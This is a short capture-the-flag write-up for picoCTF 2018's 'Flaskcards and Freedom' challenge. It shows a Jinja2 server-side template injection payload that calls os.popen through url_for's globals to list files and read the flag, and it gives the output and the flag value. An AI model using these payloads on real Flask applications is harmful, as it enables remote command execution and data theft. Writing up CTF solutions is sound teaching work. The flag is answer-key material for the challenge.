# ▼▼▼Flaskcards and Freedom - Points: 900▼▼▼
**This writeup is written by [@kazkiti_ctf](https://twitter.com/kazkiti_ctf)**

```
There seem to be a few more files stored on the flash card server but we can't login. Can you? http://2018shell2.picoctf.com:5010 (link)

Hint:
・There's more to the original vulnerability than meets the eye.
・Can you leverage the injection technique to get remote code execution?
・Sorry, but the database still reverts every 2 hours.
```

---

## 【Aim for remote code execution】

`{{url_for.__globals__.os.__dict__.popen('ls').read()}}`

↓

app flag server.py xinet_startup.sh

↓

There is `flag` file

---

`{{url_for.__globals__.os.__dict__.popen('cat flag').read()}}`

↓

`picoCTF{R_C_E_wont_let_me_be_76de9280}`